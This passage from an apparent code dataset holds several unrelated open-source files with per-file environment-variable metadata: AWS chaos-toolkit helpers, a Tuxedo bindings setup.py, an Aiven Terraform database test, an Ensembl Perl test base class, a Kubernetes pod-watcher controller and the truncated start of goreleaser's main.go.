if region:
params["region_name"] = region
return boto3.client(resource_name, **params)
def signed_api_call(service: str, path: str = "/", method: str = 'GET',
configuration: Configuration = None,
secrets: Secrets = None,
params: Dict[str, Any] = None) -> requests.Response:
"""
Perform an API call against an AWS service.
This should only be used when boto does not already implement the service
itself. See https://boto3.readthedocs.io/en/latest/reference/services/index.html
for a list of supported services by boto. This function does not claim
being generic enough to support the whole range of AWS API.
The `configuration` object should look like this:
```json
{
"aws_region": "us-east-1",
"aws_host": "amazonaws.com"
}
```
While both are optional, and default to the values shown in this snippet,
you should make sure to be explicit about them to avoid confusion.
The endpoint being called is built from the given `service` name, the
given region and host as well as the `path` of the action being called on
the service. By default, the call is made over `HTTPS` but this can be
changed by setting `aws_endpoint_scheme` in the configuration dictionary.
Pass any parameters of the API itself as part of the remaining `params`
paramater is a dictionary. It should match the signature of the service
you are trying to call and will be sent as a query-string when `method` is
`"GET"` or `"DELETE"`, or as a JSON payload otherwise. Refer to the AWS
documentation for each service type.
This function does not support profile names so you must provide the
credentials in secrets.
""" # noqa: E501
configuration = configuration or {}
region = configuration.get("aws_region", "us-east-1") or ""
host = configuration.get("aws_host", "amazonaws.com")
scheme = configuration.get("aws_endpoint_scheme", "https")
host = "{s}.{r}.{h}".format(s=service, r=region, h=host)
endpoint = configuration.get(
"aws_endpoint", '{scheme}://{h}'.format(
scheme=scheme, h=host)).replace('..', '.')
endpoint = "{e}{p}".format(e=endpoint, p=path)
creds = get_credentials(secrets)
# when creds weren't provided via secrets, we let boto search for them
# from the process environment
if creds["aws_access_key_id"] and creds["aws_secret_access_key"]:
auth = AWSRequestsAuth(
aws_access_key=creds["aws_access_key_id"],
aws_secret_access_key=creds["aws_secret_access_key"],
aws_host=host,
aws_region=region,
aws_service=service)
else:
auth = BotoAWSRequestsAuth(
aws_host=host,
aws_region=region,
aws_service=service)
headers = {
"Accept": "application/json"
}
if method in ('DELETE', 'GET'):
return requests.request(
method, endpoint, headers=headers, auth=auth, params=params)
return requests.request(
method, endpoint, headers=headers, auth=auth, json=params)
def discover(discover_system: bool = True) -> Discovery:
"""
Discover AWS capabilities from this extension as well, if a aws
configuration is available, some information about the AWS environment.
"""
logger.info("Discovering capabilities from chaostoolkit-aws")
discovery = initialize_discovery_result(
"chaostoolkit-aws", __version__, "aws")
discovery["activities"].extend(load_exported_activities())
return discovery
###############################################################################
# Private functions
###############################################################################
def load_exported_activities() -> List[DiscoveredActivities]:
"""
Extract metadata from actions and probes exposed by this extension.
"""
activities = []
activities.extend(discover_actions("chaosaws.ec2.actions"))
activities.extend(discover_probes("chaosaws.ec2.probes"))
activities.extend(discover_actions("chaosaws.ecs.actions"))
activities.extend(discover_probes("chaosaws.ecs.probes"))
activities.extend(discover_actions("chaosaws.iam.actions"))
activities.extend(discover_probes("chaosaws.iam.probes"))
activities.extend(discover_actions("chaosaws.eks.actions"))
activities.extend(discover_probes("chaosaws.eks.probes"))
activities.extend(discover_actions("chaosaws.elbv2.actions"))
activities.extend(discover_probes("chaosaws.elbv2.probes"))
activities.extend(discover_actions("chaosaws.asg.actions"))
activities.extend(discover_probes("chaosaws.asg.probes"))
activities.extend(discover_actions("chaosaws.awslambda.actions"))
activities.extend(discover_probes("chaosaws.awslambda.probes"))
activities.extend(discover_actions("chaosaws.cloudwatch.actions"))
activities.extend(discover_probes("chaosaws.cloudwatch.probes"))
activities.extend(discover_actions("chaosaws.rds.actions"))
activities.extend(discover_probes("chaosaws.rds.probes"))
activities.extend(discover_actions("chaosaws.elasticache.actions"))
activities.extend(discover_probes('chaosaws.elasticache.probes'))
activities.extend(discover_actions("chaosaws.emr.actions"))
activities.extend(discover_probes('chaosaws.emr.probes'))
activities.extend(discover_actions("chaosaws.route53.actions"))
activities.extend(discover_probes('chaosaws.route53.probes'))
return activities
| []
| []
| [
"AWS_DEFAULT_REGION",
"AWS_REGION"
]
| [] | ["AWS_DEFAULT_REGION", "AWS_REGION"] | python | 2 | 0 | |
setup.py | from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
import os
import sys
import setuptools
__name__ = 'tuxedo'
__version__ = '0.0.13'
class get_pybind_include(object):
"""Helper class to determine the pybind11 include path
The purpose of this class is to postpone importing pybind11
until it is actually installed, so that the ``get_include()``
method can be invoked. """
def __init__(self, user=False):
self.user = user
def __str__(self):
import pybind11
return pybind11.get_include(self.user)
ext_modules = [
Extension(
'tuxedo',
['src/tuxedo.cpp'],
include_dirs=[
os.path.join(os.environ['TUXDIR'], 'include'),
# Path to pybind11 headers
get_pybind_include(),
get_pybind_include(user=True),
],
library_dirs=[os.path.join(os.environ['TUXDIR'], 'lib')],
libraries=['tux', 'fml32', 'tmib', 'engine'],
language='c++'
),
]
# As of Python 3.6, CCompiler has a `has_flag` method.
# cf http://bugs.python.org/issue26689
def has_flag(compiler, flagname):
"""Return a boolean indicating whether a flag name is supported on
the specified compiler.
"""
import tempfile
with tempfile.NamedTemporaryFile('w', suffix='.cpp') as f:
f.write('int main (int argc, char **argv) { return 0; }')
try:
compiler.compile([f.name], extra_postargs=[flagname])
except setuptools.distutils.errors.CompileError:
return False
return True
def cpp_flag(compiler):
"""Return the -std=c++[11/14/17] compiler flag.
The newer version is prefered over c++11 (when it is available).
"""
flags = ['-std=c++17', '-std=c++14', '-std=c++11']
for flag in flags:
if has_flag(compiler, flag): return flag
raise RuntimeError('Unsupported compiler -- at least C++11 support '
'is needed!')
class BuildExt(build_ext):
"""A custom build extension for adding compiler-specific options."""
def build_extensions(self):
ct = self.compiler.compiler_type
opts = []
link_opts = []
if ct == 'unix':
opts.append('-DVERSION_INFO="%s"' % self.distribution.get_version())
opts.append(cpp_flag(self.compiler))
if has_flag(self.compiler, '-fvisibility=hidden'):
opts.append('-fvisibility=hidden')
elif ct == 'msvc':
opts.append('/EHsc')
opts.append('/DVERSION_INFO=\\"%s\\"' % self.distribution.get_version())
tuxdir = os.environ['TUXDIR']
#cl /MD -I"%TUXDIR%"\include -Fea BS-23b8.c a.c "%TUXDIR%"\lib\libtux.lib "%TUXDIR%"\lib\libbuft.lib "%TUXDIR%"\lib\libfml.lib "%TUXDIR%"\lib\libfml32.lib "%TUXDIR%"\lib\libengine.lib wsock32.lib kernel32.lib advapi32.lib user32.lib gdi32.lib comdlg32.lib winspool.lib -link /MANIFEST -implib:BS-23b8.lib
link_opts = [
os.path.join(tuxdir, 'lib', 'libtux.lib'),
os.path.join(tuxdir, 'lib', 'libbuft.lib'),
os.path.join(tuxdir, 'lib', 'libfml.lib'),
os.path.join(tuxdir, 'lib', 'libfml32.lib'),
os.path.join(tuxdir, 'lib', 'libengine.lib'),
os.path.join(tuxdir, 'lib', 'libtmib.lib'),
'wsock32.lib',
'kernel32.lib',
'advapi32.lib',
'user32.lib',
'gdi32.lib',
'comdlg32.lib',
'winspool.lib',
'/MANIFEST'
]
for ext in self.extensions:
ext.extra_compile_args = opts
ext.extra_link_args = link_opts
if ct == 'msvc': ext.libraries = []
build_ext.build_extensions(self)
setup(
name=__name__,
version=__version__,
author='Aivars Kalvans',
author_email='[email protected]',
url='https://github.com/aivarsk/tuxedo-python',
description='Python3 bindings for writing Oracle Tuxedo clients and servers',
long_description=open('README.rst').read(),
ext_modules=ext_modules,
install_requires=['pybind11>=2.4'],
setup_requires=['pybind11>=2.4'],
cmdclass={'build_ext': BuildExt},
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: C++',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development',
],
zip_safe=False,
)
| []
| []
| [
"TUXDIR"
]
| [] | ["TUXDIR"] | python | 1 | 0 | |
aiven/resource_database_test.go | package aiven
import (
"fmt"
"github.com/aiven/aiven-go-client"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/acctest"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
"os"
"testing"
)
func init() {
resource.AddTestSweepers("aiven_database", &resource.Sweeper{
Name: "aiven_database",
F: sweepDatabases,
Dependencies: []string{
"aiven_connection_pool",
},
})
}
func sweepDatabases(region string) error {
client, err := sharedClient(region)
if err != nil {
return fmt.Errorf("error getting client: %s", err)
}
conn := client.(*aiven.Client)
projects, err := conn.Projects.List()
if err != nil {
return fmt.Errorf("error retrieving a list of projects : %s", err)
}
for _, project := range projects {
if project.Name == os.Getenv("AIVEN_PROJECT_NAME") {
services, err := conn.Services.List(project.Name)
if err != nil {
return fmt.Errorf("error retrieving a list of services for a project `%s`: %s", project.Name, err)
}
for _, service := range services {
dbs, err := conn.Databases.List(project.Name, service.Name)
if err != nil {
if err.(aiven.Error).Status == 403 || err.(aiven.Error).Status == 501 {
continue
}
return fmt.Errorf("error retrieving a list of databases for a service `%s`: %s", service.Name, err)
}
for _, db := range dbs {
if db.DatabaseName == "defaultdb" {
continue
}
err = conn.Databases.Delete(project.Name, service.Name, db.DatabaseName)
if err != nil {
return fmt.Errorf("error destroying database `%s` during sweep: %s", db.DatabaseName, err)
}
}
}
}
}
return nil
}
func TestAccAivenDatabase_basic(t *testing.T) {
resourceName := "aiven_database.foo"
rName := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
ProviderFactories: testAccProviderFactories,
CheckDestroy: testAccCheckAivenDatabaseResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccDatabaseResource(rName),
Check: resource.ComposeTestCheckFunc(
testAccCheckAivenDatabaseAttributes("data.aiven_database.database"),
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "termination_protection", "false"),
),
},
{
Config: testAccDatabaseTerminationProtectionResource(rName),
PreventPostDestroyRefresh: true,
ExpectNonEmptyPlan: true,
PlanOnly: true,
Check: resource.ComposeTestCheckFunc(
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "termination_protection", "true"),
),
},
},
})
}
func testAccCheckAivenDatabaseResourceDestroy(s *terraform.State) error {
c := testAccProvider.Meta().(*aiven.Client)
// loop through the resources in state, verifying each database is destroyed
for _, rs := range s.RootModule().Resources {
if rs.Type != "aiven_database" {
continue
}
projectName, serviceName, databaseName := splitResourceID3(rs.Primary.ID)
db, err := c.Databases.Get(projectName, serviceName, databaseName)
if err != nil {
if err.(aiven.Error).Status != 404 {
return err
}
}
if db != nil {
return fmt.Errorf("databse (%s) still exists", rs.Primary.ID)
}
}
return nil
}
func testAccDatabaseResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_service" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
service_type = "pg"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
pg_user_config {
pg_version = 11
public_access {
pg = true
prometheus = false
}
pg {
idle_in_transaction_session_timeout = 900
}
}
}
resource "aiven_database" "foo" {
project = aiven_service.bar.project
service_name = aiven_service.bar.service_name
database_name = "test-acc-db-%s"
}
data "aiven_database" "database" {
project = aiven_database.foo.project
service_name = aiven_database.foo.service_name
database_name = aiven_database.foo.database_name
depends_on = [aiven_database.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name)
}
func testAccDatabaseTerminationProtectionResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_service" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
service_type = "pg"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
pg_user_config {
pg_version = 11
public_access {
pg = true
prometheus = false
}
pg {
idle_in_transaction_session_timeout = 900
}
}
}
resource "aiven_database" "foo" {
project = aiven_service.bar.project
service_name = aiven_service.bar.service_name
database_name = "test-acc-db-%s"
termination_protection = true
}
data "aiven_database" "database" {
project = aiven_database.foo.project
service_name = aiven_database.foo.service_name
database_name = aiven_database.foo.database_name
depends_on = [aiven_database.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name)
}
func testAccCheckAivenDatabaseAttributes(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
r := s.RootModule().Resources[n]
a := r.Primary.Attributes
if a["project"] == "" {
return fmt.Errorf("expected to get a project name from Aiven")
}
if a["service_name"] == "" {
return fmt.Errorf("expected to get a service_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
return nil
}
}
| [
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\""
]
| []
| [
"AIVEN_PROJECT_NAME"
]
| [] | ["AIVEN_PROJECT_NAME"] | go | 1 | 0 | |
src/org/ensembl/healthcheck/testcase/AbstractPerlBasedTestCase.java | /*
* Copyright [1999-2015] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
* Copyright [2016-2019] EMBL-European Bioinformatics Institute
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* File: AbstractPerlBasedTestCase.java
* Created by: dstaines
* Created on: Nov 13, 2009
* CVS: $$
*/
package org.ensembl.healthcheck.testcase;
import java.util.Map;
import org.apache.commons.lang.StringUtils;
import org.ensembl.healthcheck.DatabaseRegistryEntry;
/**
* <p>
* Base class for invoking a perl script to carry out the test and parse the
* output.
* </p>
*
* @author dstaines
*
*/
public abstract class AbstractPerlBasedTestCase extends
AbstractShellBasedTestCase {
public static final String PERLOPTS = "perlopts";
public static final String PERL = "perl";
protected String PERL5LIB = null;
public String getPERL5LIB() {
return PERL5LIB;
}
public void setPERL5LIB(String pERL5LIB) {
PERL5LIB = pERL5LIB;
}
protected PerlScriptConfig config;
public PerlScriptConfig getConfig() {
if (config == null) {
config = new PerlScriptConfig(System.getProperty(PERL),
System.getProperty(PERLOPTS));
}
return config;
}
public void setConfig(PerlScriptConfig config) {
this.config = config;
}
public AbstractPerlBasedTestCase() {
// set PERL5LIB by default
String perl5Lib = System.getenv().get("PERL5LIB");
if (!StringUtils.isEmpty(perl5Lib)) {
setPERL5LIB(perl5Lib);
}
}
/**
* @return String perl script and relevant arguments to invoke with perl
* binary and options from
* {@link AbstractPerlBasedTestCase#getConfig()}
*/
protected abstract String getPerlScript(DatabaseRegistryEntry dbre,
int speciesId);
protected String createCommandLine(final DatabaseRegistryEntry dbre,
int speciesId) {
String commandLine = getPerlScript(dbre, speciesId);
if (getConfig() != null) {
if (!StringUtils.isEmpty(getConfig().getPerlBinary())) {
if (StringUtils.isEmpty(getConfig().getPerlOptions())) {
commandLine = config.getPerlBinary() + " " + commandLine;
} else {
commandLine = config.getPerlBinary() + " "
+ config.getPerlOptions() + " " + commandLine;
}
}
}
return commandLine;
}
protected Map<String,String> environmentVarsToSet() {
Map<String,String> inheritedEnvironment = super.environmentVarsToSet();
if(!StringUtils.isEmpty(getPERL5LIB())) {
inheritedEnvironment.put("PERL5LIB", getPERL5LIB());
}
return inheritedEnvironment;
}
}
| []
| []
| []
| [] | [] | java | 0 | 0 | |
pkg/controller/pod_watcher.go | /*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package controller
import (
"context"
"fmt"
"os"
"time"
corev1 "k8s.io/api/core/v1"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
utilruntime "k8s.io/apimachinery/pkg/util/runtime"
"k8s.io/apimachinery/pkg/util/wait"
coreinformers "k8s.io/client-go/informers/core/v1"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/kubernetes/scheme"
typedcorev1 "k8s.io/client-go/kubernetes/typed/core/v1"
corelisters "k8s.io/client-go/listers/core/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/client-go/util/workqueue"
"k8s.io/klog/v2"
"gitlab.com/4406arthur/mlaas_kubewatcher/pkg/reply"
"gitlab.com/4406arthur/mlaas_kubewatcher/pkg/webhook"
)
const controllerAgentName = "MLaasJobWatcher"
const (
// SuccessSynced is used as part of the Event 'reason' when a Foo is synced
SuccessSynced = "Synced"
// ErrResourceExists is used as part of the Event 'reason' when a Foo fails
// to sync due to a Deployment of the same name already existing.
ErrResourceExists = "ErrResourceExists"
// MessageResourceExists is the message used for Events when a resource
// fails to sync due to a Deployment already existing
MessageResourceExists = "Resource %q already exists and is not managed by Foo"
// MessageResourceSynced is the message used for an Event fired when a Foo
// is synced successfully
MessageResourceSynced = "Foo synced successfully"
)
// Controller is the controller implementation for Foo resources
type Controller struct {
// kubeclientset is a standard kubernetes clientset
kubeclientset kubernetes.Interface
podsLister corelisters.PodLister
podsSynced cache.InformerSynced
// workqueue is a rate limited work queue. This is used to queue work to be
// processed instead of performing it as soon as a change happens. This
// means we can ensure we only process a fixed amount of resources at a
// time, and makes it easy to ensure we are never processing the same item
// simultaneously in two different workers.
workqueue workqueue.RateLimitingInterface
// recorder is an event recorder for recording Event resources to the
// Kubernetes API.
recorder record.EventRecorder
controllerSDK *reply.ControllerSDK
}
// NewController returns a new sample controller
func NewController(
kubeclientset kubernetes.Interface,
podInformer coreinformers.PodInformer,
controllerSDK *reply.ControllerSDK) *Controller {
klog.V(4).Info("Creating event broadcaster")
eventBroadcaster := record.NewBroadcaster()
eventBroadcaster.StartLogging(klog.Infof)
eventBroadcaster.StartRecordingToSink(&typedcorev1.EventSinkImpl{Interface: kubeclientset.CoreV1().Events("")})
recorder := eventBroadcaster.NewRecorder(scheme.Scheme, corev1.EventSource{Component: controllerAgentName})
controller := &Controller{
kubeclientset: kubeclientset,
podsLister: podInformer.Lister(),
podsSynced: podInformer.Informer().HasSynced,
workqueue: workqueue.NewNamedRateLimitingQueue(workqueue.DefaultControllerRateLimiter(), "watcher"),
recorder: recorder,
controllerSDK: controllerSDK,
}
klog.Info("Setting up event handlers")
// Set up an event handler for when Pod resources change. This
// handler will lookup the owner of the given Pod, and if it is
// owned by a Job will enqueue for processing.
podInformer.Informer().AddEventHandler(
cache.FilteringResourceEventHandler{
FilterFunc: func(obj interface{}) bool {
switch t := obj.(type) {
case *v1.Pod:
return checkPodLabel(t, os.Getenv("POD_CATEGORY"))
default:
return false
}
},
Handler: cache.ResourceEventHandlerFuncs{
UpdateFunc: func(old, new interface{}) {
newPod := new.(*corev1.Pod)
oldPod := old.(*corev1.Pod)
if newPod.ResourceVersion == oldPod.ResourceVersion {
// Periodic resync will send update events for all known Deployments.
// Two different versions of the same Deployment will always have different RVs.
return
}
controller.handleObject(new)
},
},
})
return controller
}
// Run will set up the event handlers for types we are interested in, as well
// as syncing informer caches and starting workers. It will block until stopCh
// is closed, at which point it will shutdown the workqueue and wait for
// workers to finish processing their current work items.
func (c *Controller) Run(threadiness int, stopCh <-chan struct{}) error {
defer utilruntime.HandleCrash()
defer c.workqueue.ShutDown()
// Wait for the caches to be synced before starting workers
klog.Info("Waiting for informer caches to sync")
if ok := cache.WaitForCacheSync(stopCh, c.podsSynced); !ok {
return fmt.Errorf("failed to wait for caches to sync")
}
klog.Info("Starting workers")
// Launch two workers to process
for i := 0; i < threadiness; i++ {
go wait.Until(c.runWorker, time.Second, stopCh)
}
klog.Info("Started workers")
<-stopCh
klog.Info("Shutting down workers")
return nil
}
// runWorker is a long-running function that will continually call the
// processNextWorkItem function in order to read and process a message on the
// workqueue.
func (c *Controller) runWorker() {
for c.processNextWorkItem() {
}
}
// processNextWorkItem will read a single work item off the workqueue and
// attempt to process it, by calling the syncHandler.
func (c *Controller) processNextWorkItem() bool {
obj, shutdown := c.workqueue.Get()
if shutdown {
return false
}
// We wrap this block in a func so we can defer c.workqueue.Done.
err := func(obj interface{}) error {
// We call Done here so the workqueue knows we have finished
// processing this item. We also must remember to call Forget if we
// do not want this work item being re-queued. For example, we do
// not call Forget if a transient error occurs, instead the item is
// put back on the workqueue and attempted again after a back-off
// period.
defer c.workqueue.Done(obj)
var key string
var ok bool
// We expect strings to come off the workqueue. These are of the
// form namespace/name. We do this as the delayed nature of the
// workqueue means the items in the informer cache may actually be
// more up to date that when the item was initially put onto the
// workqueue.
if key, ok = obj.(string); !ok {
// As the item in the workqueue is actually invalid, we call
// Forget here else we'd go into a loop of attempting to
// process a work item that is invalid.
c.workqueue.Forget(obj)
utilruntime.HandleError(fmt.Errorf("expected string in workqueue but got %#v", obj))
return nil
}
// Run the syncHandler, passing it the namespace/name string of the
// Foo resource to be synced.
if err := c.syncHandler(key); err != nil {
// Put the item back on the workqueue to handle any transient errors.
c.workqueue.AddRateLimited(key)
return fmt.Errorf("error syncing '%s': %s, requeuing", key, err.Error())
}
// Finally, if no error occurs we Forget this item so it does not
// get queued again until another change happens.
c.workqueue.Forget(obj)
klog.Infof("Successfully synced '%s'", key)
return nil
}(obj)
if err != nil {
utilruntime.HandleError(err)
return true
}
return true
}
// syncHandler compares the actual state with the desired, and attempts to
// converge the two, injection business logic here
func (c *Controller) syncHandler(key string) error {
// Convert the namespace/name string into a distinct namespace and name
namespace, name, err := cache.SplitMetaNamespaceKey(key)
if err != nil {
utilruntime.HandleError(fmt.Errorf("invalid resource key: %s", key))
return nil
}
// Get the pods resource with this namespace/name
pod, err := c.podsLister.Pods(namespace).Get(name)
if err != nil {
// The Pod resource may no longer exist, in which case we stop
// processing.
if errors.IsNotFound(err) {
utilruntime.HandleError(fmt.Errorf("Pod '%s' in work queue no longer exists", name))
return nil
}
return err
}
Status := pod.Status.Phase
Labels := pod.GetLabels()
jobName := Labels["job-name"]
if Status == "Succeeded" && pod.Status.ContainerStatuses[0].State.Terminated.ExitCode == int32(0) {
klog.Infof("job successfully terminated: '%v'", pod.GetName())
err = c.controllerSDK.Reply(jobName, true)
if err != nil {
klog.Infof("callback to controller failed: '%s'", err.Error())
}
if Labels["webhook-enable"] == "true" {
annotations, _ := getJobAnnotation(c.kubeclientset, jobName, namespace)
err = webhook.Callback(annotations["webhook-endpoint"], true, annotations["webhook-payload"])
if err != nil {
klog.Infof("webhook invoke failed: '%s'", err.Error())
}
}
}
if Status == "Failed" {
klog.Infof("job failed: '%v'", pod.GetName())
err = c.controllerSDK.Reply(jobName, false)
if err != nil {
klog.Infof("callback to controller failed: '%s'", err.Error())
}
//TODO: Send Mail
if Labels["webhook-enable"] == "true" {
annotations, _ := getJobAnnotation(c.kubeclientset, jobName, namespace)
err = webhook.Callback(annotations["webhook-endpoint"], false, annotations["webhook-payload"])
if err != nil {
klog.Infof("webhook invoke failed: '%s'", err.Error())
}
}
}
return nil
}
// enqueue takes a Pod resource and converts it into a namespace/name
// string which is then put onto the work queue. This method should *not* be
// passed resources of any type other than Foo.
func (c *Controller) enqueue(obj interface{}) {
var key string
var err error
if key, err = cache.MetaNamespaceKeyFunc(obj); err != nil {
utilruntime.HandleError(err)
return
}
c.workqueue.Add(key)
}
// handleObject will take any resource implementing metav1.Object.DeepCopyObject
// If the object does not have an appropriate config, it will simply be skipped.
func (c *Controller) handleObject(obj interface{}) {
var object metav1.Object
var ok bool
if object, ok = obj.(metav1.Object); !ok {
tombstone, ok := obj.(cache.DeletedFinalStateUnknown)
if !ok {
utilruntime.HandleError(fmt.Errorf("error decoding object, invalid type"))
return
}
object, ok = tombstone.Obj.(metav1.Object)
if !ok {
utilruntime.HandleError(fmt.Errorf("error decoding object tombstone, invalid type"))
return
}
klog.V(4).Infof("Recovered deleted object '%s' from tombstone", object.GetName())
}
klog.V(4).Infof("Processing object: %s", object.GetName())
pod, err := c.podsLister.Pods(object.GetNamespace()).Get(object.GetName())
if err != nil {
klog.V(4).Infof("ignoring orphaned object '%s' of '%s'", object.GetSelfLink(), object.GetName())
return
}
c.enqueue(pod)
return
// if ownerRef := metav1.GetControllerOf(object); ownerRef != nil {
// // If this object is not owned by job kind, we should not do anything more
// if ownerRef.Kind != "Job" {
// return
// }
// pod, err := c.podsLister.Pods(object.GetNamespace()).Get(object.GetName())
// if err != nil {
// klog.V(4).Infof("ignoring orphaned object '%s' of '%s'", object.GetSelfLink(), ownerRef.Name)
// return
// }
// c.enqueue(pod)
// return
// }
}
func checkPodLabel(pod *v1.Pod, category string) bool {
if val, ok := pod.Labels["category"]; ok && val == category {
// check job-name label too, we have specfic nameing logic here
// jobLabel, exists := pod.Labels["job-name"]
// if exists && strings.Contains(jobLabel, ".") {
// return true
// }
return true
}
return false
}
func getJobAnnotation(clientset kubernetes.Interface, jobName, namespace string) (map[string]string, error) {
job, err := clientset.BatchV1().Jobs(namespace).Get(context.TODO(), jobName, metav1.GetOptions{})
if err != nil {
return nil, err
}
return job.GetAnnotations(), nil
}
| [
"\"POD_CATEGORY\""
]
| []
| [
"POD_CATEGORY"
]
| [] | ["POD_CATEGORY"] | go | 1 | 0 | |
main.go | package main
import (
"fmt"
"io/ioutil"
"os"
"time"
"github.com/apex/log"
"github.com/apex/log/handlers/cli"
"github.com/caarlos0/ctrlc"
"github.com/fatih/color"
"github.com/goreleaser/goreleaser/internal/middleware"
"github.com/goreleaser/goreleaser/internal/pipe/defaults"
"github.com/goreleaser/goreleaser/internal/pipeline"
"github.com/goreleaser/goreleaser/internal/static"
"github.com/goreleaser/goreleaser/pkg/config"
"github.com/goreleaser/goreleaser/pkg/context"
"gopkg.in/alecthomas/kingpin.v2"
)
// nolint: gochecknoglobals
var (
version = "dev"
commit = ""
date = ""
builtBy = ""
)
type releaseOptions struct {
Config string
ReleaseNotes string
ReleaseHeader string
ReleaseFooter string
Snapshot bool
SkipPublish bool
SkipSign bool
SkipValidate bool
RmDist bool
Parallelism int
Timeout time.Duration
}
func main() {
// enable colored output on travis
if os.Getenv("CI") != "" {
color.NoColor = false
}
log.SetHandler(cli.Default)
fmt.Println()
defer fmt.Println()
var app = kingpin.New("goreleaser", "Deliver Go binaries as fast and easily as possible")
var debug = app.Flag("debug", "Enable debug mode").Bool()
var config = app.Flag("config", "Load configuration from file").Short('c').Short('f').PlaceHolder(".goreleaser.yml").String()
var initCmd = app.Command("init", "Generates a .goreleaser.yml file").Alias("i")
var checkCmd = app.Command("check", "Checks if configuration is valid").Alias("c")
var releaseCmd = app.Command("release", "Releases the current project").Alias("r").Default()
var releaseNotes = releaseCmd.Flag("release-notes", "Load custom release notes from a markdown file").PlaceHolder("notes.md").String()
var releaseHeader = releaseCmd.Flag("release-header", "Load custom release notes header from a markdown file").PlaceHolder("notes-header.md").String()
var releaseFooter = releaseCmd.Flag("release-footer", "Load custom release notes footer from a markdown file").PlaceHolder("notes-footer.md").String()
var snapshot = releaseCmd.Flag("snapshot", "Generate an unversioned snapshot release, skipping all validations and without publishing any artifacts").Bool()
var skipPublish = releaseCmd.Flag("skip-publish", "Skips publishing artifacts").Bool()
var skipSign = releaseCmd.Flag("skip-sign", "Skips signing the artifacts").Bool()
var skipValidate = releaseCmd.Flag("skip-validate", "Skips several sanity checks").Bool()
var rmDist = releaseCmd.Flag("rm-dist", "Remove the dist folder before building").Bool()
var parallelism = releaseCmd.Flag("parallelism", "Amount tasks to run concurrently").Short('p').Default("4").Int()
var timeout = releaseCmd.Flag("timeout", "Timeout to the entire release process").Default("30m").Duration()
app.Version(buildVersion(version, commit, date, builtBy))
app.VersionFlag.Short('v')
app.HelpFlag.Short('h')
app.UsageTemplate(static.UsageTemplate)
cmd := kingpin.MustParse(app.Parse(os.Args[1:]))
if *debug {
log.SetLevel(log.DebugLevel)
}
switch cmd {
case initCmd.FullCommand():
var filename = *config
if filename == "" {
filename = ".goreleaser.yml"
}
if err := initProject(filename); err != nil {
log.WithError(err).Error("failed to init project")
os.Exit(1)
return
}
log.WithField("file", filename).Info("config created; please edit accordingly to your needs")
case checkCmd.FullCommand():
if err := checkConfig(*config); err != nil {
log.WithError(err).Errorf(color.New(color.Bold).Sprintf("config is invalid"))
os.Exit(1)
return
}
log.Infof(color.New(color.Bold).Sprintf("config is valid"))
case releaseCmd.FullCommand():
start := time.Now()
log.Infof(color.New(color.Bold).Sprintf("releasing using goreleaser %s...", version))
var options = releaseOptions{
Config: *config,
ReleaseNotes: *releaseNotes,
ReleaseHeader: *releaseHeader,
ReleaseFooter: *releaseFooter,
Snapshot: *snapshot,
SkipPublish: *skipPublish,
SkipValidate: *skipValidate,
SkipSign: *skipSign,
RmDist: *rmDist,
Parallelism: *parallelism,
Timeout: *timeout,
}
